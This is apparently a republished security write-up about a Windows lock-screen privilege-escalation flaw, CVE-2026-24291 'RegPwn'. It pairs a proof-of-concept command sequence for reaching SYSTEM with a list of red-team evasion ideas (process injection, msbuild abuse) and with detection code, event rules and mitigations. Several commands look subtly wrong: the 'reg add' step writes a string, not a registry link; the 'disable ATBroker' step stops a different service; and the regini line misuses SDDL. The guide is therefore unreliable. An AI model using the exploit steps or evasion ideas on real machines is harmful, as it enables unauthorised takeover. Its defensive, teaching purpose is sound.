Inside RegPwn (CVE‑2026‑24291): How a Simple Lock‑Screen Race Condition Grants SYSTEM Access
CVE‑2026‑24291, dubbed RegPwn, exploits a race condition in the Windows ATConfig mechanism that lets a standard user create a registry symbolic link, trigger a lock‑screen transition, and silently elevate to SYSTEM, affecting multiple Windows 10, 11, and Server releases until patched in March 2026.
Vulnerability Overview
CVE‑2026‑24291 (RegPwn) is a high‑severity local privilege‑escalation flaw discovered by MDSec and disclosed in March 2026. It resides in the Windows accessibility infrastructure, specifically the ATBroker.exe service, which runs as SYSTEM and communicates with user‑level registry keys via the ATConfig mechanism.
Technical Mechanism
Affected Components
ATBroker.exe (Assistive Technology Broker) runs with SYSTEM privileges and reads configuration from HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Accessibility, then writes to system‑level keys under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.
Root Cause
The flaw is a logic‑level race condition: when a user locks the workstation (Win+L), ATBroker synchronizes ATConfig settings to the system registry. If an attacker pre‑creates a registry symbolic link (REG_LINK) under HKCU that points to a protected HKLM service key, ATBroker follows the link and writes with SYSTEM rights, effectively hijacking the target service configuration.
CWE Classification
CWE‑362: Race Condition – exploitation of the lock‑screen transition window.
CWE‑59: Improper Link Following – lack of validation for registry symbolic links.
CWE‑732: Incorrect Permission Assignment – ambiguous trust boundary between HKCU and HKLM.
Exploit Demonstration
The public PoC follows three main steps:
Check environment
# Confirm current user
whoami
# Output: DESKTOP-XXXX\User
Create symbolic link (low‑privilege)
reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATConfig" /ve /d "\??\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Services\msiserver" /f
Trigger the race condition
rundll32.exe user32.dll,LockWorkStation
Verify escalation
whoami
# Output: NT AUTHORITY\SYSTEM
After escalation, an attacker can disable security software, install persistence backdoors, move laterally, or exfiltrate credentials such as LSASS hashes.
Impact
Affected Versions
Windows 11 22H2, 23H2, 24H2 – patched with KB5077181 (or later).
Windows 10 21H2, Enterprise LTSC – patched.
Windows Server 2016, 2019, 2022, 2025 – patched.
Typical Attack Scenarios
Post‑compromise lateral movement: red team gains a low‑privilege RDP session and uses RegPwn to reach SYSTEM within seconds.
Physical access: brief contact with an unlocked workstation allows rapid privilege gain.
Malware persistence: infected devices repeatedly trigger the exploit to maintain high‑privilege footholds.
Disclosure Timeline & Public Exploits
Dec 2025 – MDSec reports the issue to Microsoft.
Feb 2026 – Microsoft acknowledges and begins patch development.
10 Mar 2026 – Out‑of‑band security update released (KB5077181, KB5075897, KB5075899).
Mid‑Mar 2026 – PoC source published on GitHub.
Late Mar 2026 – Integration into Brute Ratel C4 as a BOF module.
Public PoCs include a pure C implementation on GitHub (lennertdefauw/CVE-2026-24291), a Brute Ratel BOF module, and a Metasploit module post/windows/escalate/regpwn.
Detection & Forensics
Windows Event Monitoring
4657 (Security) – registry value changes under HKLM\SYSTEM\CurrentControlSet\Services.
4688 (Security) – new processes with SYSTEM parent (e.g., cmd.exe, powershell.exe).
4670 (Security) – ACL modifications on registry keys.
7036 (Service Control Manager) – unexpected service state changes.
1001 (Application) – ATBroker crashes in Windows Error Reporting.
Sysmon Rules
<!-- Fragment for the EventFiltering section of a Sysmon configuration -->
<!-- Monitor the ATBroker process tree: ATBroker.exe itself and any process it spawns -->
<RuleGroup name="" groupRelation="or">
<ProcessCreate onmatch="include">
<Image condition="is">C:\Windows\System32\ATBroker.exe</Image>
<ParentImage condition="is">C:\Windows\System32\ATBroker.exe</ParentImage>
</ProcessCreate>
</RuleGroup>
<!-- Monitor HKLM registry writes to service configuration -->
<RuleGroup name="" groupRelation="or">
<RegistryEvent onmatch="include">
<TargetObject condition="contains">\SYSTEM\CurrentControlSet\Services\</TargetObject>
</RegistryEvent>
</RuleGroup>
Indicators of Compromise
Creation of a REG_LINK under HKCU\...\ATConfig pointing to HKLM services.
ATBroker.exe spawning child processes (reg.exe, powershell.exe) shortly after lock‑screen.
Modification of ImagePath for services such as msiserver to non‑standard locations.
Outbound C2 connections shortly after escalation.
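As an added illustration of how the events and indicators above can be correlated (example code written for this page, not from the PoC or any vendor rule set): the function below walks a list of Security events using the real 4657/4688 field names, flags each indicator listed above, and raises severity when an HKLM Services write by ATBroker.exe follows an HKCU ATConfig redirect within a short window. The sample events are constructed, and the 60‑second window and the trusted‑directory list are assumptions.

```python
# Correlate Security events 4657/4688 for the RegPwn pattern. Example code written for this
# page (not the PoC's or a vendor's); events are constructed but use the real 4657/4688 fields.
from datetime import datetime, timedelta

SERVICES_KEY = "\\REGISTRY\\MACHINE\\SYSTEM\\CURRENTCONTROLSET\\SERVICES\\"
ATCONFIG_KEY = "\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\ACCESSIBILITY\\ATCONFIG"
TRUSTED_DIRS = ("C:\\WINDOWS\\SYSTEM32\\", "C:\\WINDOWS\\SYSWOW64\\", "%SYSTEMROOT%\\SYSTEM32\\")  # assumed
SUSPECT_CHILDREN = ("REG.EXE", "POWERSHELL.EXE", "CMD.EXE")
WINDOW = timedelta(seconds=60)  # assumption: the lock-screen sync follows the link creation within seconds

def detect_regpwn(events):
    """Return (timestamp, message) findings, oldest first; matching is case-insensitive."""
    findings, link_seen = [], None
    for ev in sorted(events, key=lambda e: e["ts"]):
        f = {k: str(v).upper() for k, v in ev["fields"].items()}
        if ev["id"] == 4657:
            obj, proc, val = f["ObjectName"], f["ProcessName"], f.get("NewValue", "")
            # IoC: user-hive ATConfig value whose target lives in HKLM (a symbolic-link target)
            if obj.endswith(ATCONFIG_KEY) and "\\REGISTRY\\MACHINE\\" in val:
                link_seen = ev["ts"]
                findings.append((ev["ts"], "HKCU ATConfig value redirects into HKLM: " + val))
            # IoC: ATBroker.exe (runs as SYSTEM) writing a value under HKLM ...\Services
            elif obj.startswith(SERVICES_KEY) and proc.endswith("\\ATBROKER.EXE"):
                sev = "HIGH" if link_seen and ev["ts"] - link_seen <= WINDOW else "MEDIUM"
                findings.append((ev["ts"], f"{sev}: ATBroker.exe wrote {f['ObjectValueName']} under {obj}"))
                # IoC: service ImagePath moved outside the system directories
                if f["ObjectValueName"] == "IMAGEPATH" and not val.lstrip('"').startswith(TRUSTED_DIRS):
                    findings.append((ev["ts"], "ImagePath points to a non-standard location: " + val))
        elif ev["id"] == 4688:
            # IoC: registry/shell tools spawned with ATBroker.exe as parent
            child = f["NewProcessName"].rsplit("\\", 1)[-1]
            if f["ParentProcessName"].endswith("\\ATBROKER.EXE") and child in SUSPECT_CHILDREN:
                findings.append((ev["ts"], "ATBroker.exe spawned " + f["NewProcessName"]))
    return findings
T0 = datetime(2026, 3, 12, 9, 0, 0)
SVC = r"\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Services\msiserver"
SAMPLE_EVENTS = [  # constructed sample telemetry, not a real capture
    {"ts": T0, "id": 4657, "fields": {"ProcessName": r"C:\Windows\System32\reg.exe",
        "ObjectName": r"\REGISTRY\USER\S-1-5-21-1-2-3-1001\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATConfig",
        "ObjectValueName": "(Default)", "NewValue": "\\??" + SVC}},
    {"ts": T0 + timedelta(seconds=8), "id": 4657, "fields": {"ProcessName": r"C:\Windows\System32\ATBroker.exe",
        "ObjectName": SVC, "ObjectValueName": "ImagePath", "NewValue": r"C:\Users\Public\svc.exe"}},
    {"ts": T0 + timedelta(seconds=9), "id": 4688, "fields": {"ParentProcessName": r"C:\Windows\System32\ATBroker.exe",
        "NewProcessName": r"C:\Windows\System32\cmd.exe"}},
    {"ts": T0 + timedelta(seconds=30), "id": 4657, "fields": {"ProcessName": r"C:\Windows\System32\services.exe",
        "ObjectName": SVC, "ObjectValueName": "Start", "NewValue": "3"}},  # benign SCM write
]
if __name__ == "__main__":
    for ts, msg in detect_regpwn(SAMPLE_EVENTS):
        print(ts.isoformat(), msg)
```

On the sample, the benign services.exe write produces no finding, while the ATBroker write is rated HIGH because it lands eight seconds after the ATConfig redirect.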
Mitigation
Official Patches
Windows 11 24H2 – install KB5077181 or later.
Windows 11 23H2/22H2 – install KB5075897.
Windows Server 2025 24H2 – install KB5075899.
Windows Server 2022 – install KB5075897.
Temporary Mitigations (if patch cannot be applied)
Disable the Assistive Technology Broker service:
# Disable ATBroker
sc config "BrokerInfrastructure" start= disabled
net stop "BrokerInfrastructure"
Restrict write permissions on HKCU\...\ATConfig:
# Apply restrictive ACL
regini.exe system.ini HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATConfig = "D:P(A;;GA;;;SY)(A;;GR;;;BU)(A;;GR;;;IU)"
Force UAC to always prompt on the secure desktop:
# Set ConsentPromptBehaviorAdmin to 2
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "ConsentPromptBehaviorAdmin" -Value 2
Deploy AppLocker or WDAC rules to block unsigned executables from temporary locations.
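To verify that an ACL such as the one applied to ATConfig above really leaves standard users with no write path, here is an added audit helper (example code written for this page, not a Microsoft tool): it parses an SDDL DACL string and reports allow‑ACEs that grant write‑capable rights to anyone other than SYSTEM or Administrators. The right‑letter mapping assumes registry‑key semantics (DC = KEY_SET_VALUE, LC = KEY_CREATE_SUB_KEY, WP = KEY_CREATE_LINK) and treats unknown tokens as write‑capable; the SDDL strings other than the page's own are constructed.

```python
# Audit an SDDL DACL (the string form regini and Get-Acl expose) for allow-ACEs that
# hand write-capable rights to trustees other than SYSTEM or Administrators.
# Example code written for this page; constructed SDDL strings are used for testing.
import re

ACE_RE = re.compile(r"\(([^)]*)\)")
# Two-letter rights that are read-only on a registry key: generic read/execute,
# KEY_READ/KEY_EXECUTE, KEY_QUERY_VALUE (CC), KEY_ENUMERATE_SUB_KEYS (SW),
# KEY_NOTIFY (RP) and READ_CONTROL (RC). Every other token (GA, GW, KA, KW,
# DC = KEY_SET_VALUE, LC = KEY_CREATE_SUB_KEY, WP = KEY_CREATE_LINK, SD, WD, WO, ...)
# is treated as write-capable, so an unknown token fails closed.
READ_ONLY = {"GR", "GX", "KR", "KX", "CC", "SW", "RP", "RC"}
# Hex-mask equivalents: KEY_SET_VALUE | KEY_CREATE_SUB_KEY | KEY_CREATE_LINK |
# DELETE | WRITE_DAC | WRITE_OWNER | GENERIC_WRITE | GENERIC_ALL
WRITE_MASK = 0x2 | 0x4 | 0x20 | 0x10000 | 0x40000 | 0x80000 | 0x40000000 | 0x10000000
PRIVILEGED = {"SY", "BA"}  # SYSTEM and BUILTIN\Administrators are expected to hold full control

def dacl_write_grants(sddl):
    """Return [(trustee, rights)] for allow-ACEs that grant write to non-privileged trustees."""
    m = re.search(r"D:(.*?)(?=S:|$)", sddl)
    if not m:
        raise ValueError("SDDL has no DACL (D:) section")
    grants = []
    for ace in ACE_RE.findall(m.group(1)):
        parts = ace.split(";")
        if len(parts) < 6:
            continue  # malformed ACE; nothing to evaluate
        ace_type, rights, trustee = parts[0], parts[2], parts[5]
        if ace_type != "A" or trustee in PRIVILEGED:
            continue  # deny ACEs and privileged trustees do not widen the write surface
        if rights.lower().startswith("0x"):
            writable = int(rights, 16) & WRITE_MASK != 0
        else:
            tokens = {rights[i:i + 2] for i in range(0, len(rights), 2)}
            writable = not tokens <= READ_ONLY  # any non-read token counts as write-capable
        if writable:
            grants.append((trustee, rights))
    return grants

# The ACL the mitigation above applies to HKCU\...\ATConfig: SYSTEM full control,
# Users and Interactive read-only, so the audit reports nothing.
ATCONFIG_SDDL = "D:P(A;;GA;;;SY)(A;;GR;;;BU)(A;;GR;;;IU)"

if __name__ == "__main__":
    print(dacl_write_grants(ATCONFIG_SDDL))                      # []
    print(dacl_write_grants("D:(A;;KA;;;BU)(A;;0xf003f;;;IU)"))  # [('BU', 'KA'), ('IU', '0xf003f')]
```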
Red‑Team Bypass Ideas
Inject payload into a trusted process (e.g., notepad.exe) to avoid file‑based detection.
Use signed system binaries like msbuild.exe to load malicious configuration when AppLocker blocks custom executables.
Replace symbolic links with junctions if SeCreateSymbolicLinkPrivilege is available.
Simulate the lock‑screen transition via SendMessage/SendInput APIs when direct locking is restricted.
Red‑Team Value & Defender Recommendations
Why Attackers Favor RegPwn
High stability – logic‑based, rarely triggers BSODs.
Stealth – no driver loading or obvious registry tampering.
Broad compatibility across Windows 10, 11, and Server 2016‑2025.
Easy to evade AV – pure user‑mode operations.
Defender Guidance
Prioritize deployment of the KB patches within 72 hours.
Configure EDR/XDR alerts for abnormal ATBroker.exe process trees.
Apply least‑privilege ACLs to HKLM\SYSTEM\CurrentControlSet\Services\ for standard users.
Regularly audit registry ACLs using Get-Acl or RegDACL.
Run the public PoC in a lab environment to validate detection rules.
Conclusion
CVE‑2026‑24291 (RegPwn) illustrates a dangerous class of logic flaws where accessibility services unintentionally trust user‑controlled registry data, allowing a trivial race condition to elevate a standard account to SYSTEM. Understanding this mechanism enables defenders to craft precise detection (monitoring ATBroker activity, registry symbolic link creation, and unexpected service modifications) and reinforces the need for strict privilege boundaries in system components.
This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contact us and we will review it promptly.
Black & White Path